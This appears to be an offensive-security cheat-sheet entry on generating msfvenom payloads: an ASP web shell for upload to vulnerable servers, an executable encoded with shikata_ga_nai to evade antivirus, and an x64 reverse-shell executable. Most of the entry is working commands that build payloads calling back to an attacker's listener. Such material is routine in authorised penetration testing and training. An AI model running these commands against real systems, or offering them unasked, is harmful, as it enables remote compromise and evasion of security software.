← Back to search

Generate Payloads with msfvenom

exploitationtool

Summary

Build reverse-shell / meterpreter payloads in various formats (asp, exe) with msfvenom, optionally encoding to evade simple AV.

Walkthrough

msfvenom generates standalone payloads (meterpreter or plain reverse shells) in whatever format the target accepts.

Steps

  1. Generate a web payload (e.g. .asp) for upload to a vulnerable web server.
  2. Produce an encoded x86 executable with -i 10 -e x86/shikata_ga_nai to obfuscate the payload against basic detection.
  3. Build a simple x64 reverse-shell .exe when you just need a non-meterpreter callback.
  4. Set LHOST/LPORT to your listener and catch the connection with a matching handler or Netcat.

Commands

bash

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f asp > shell.asp

bash

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > shell.exe

bash

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=8220 -f exe -o revshell.exe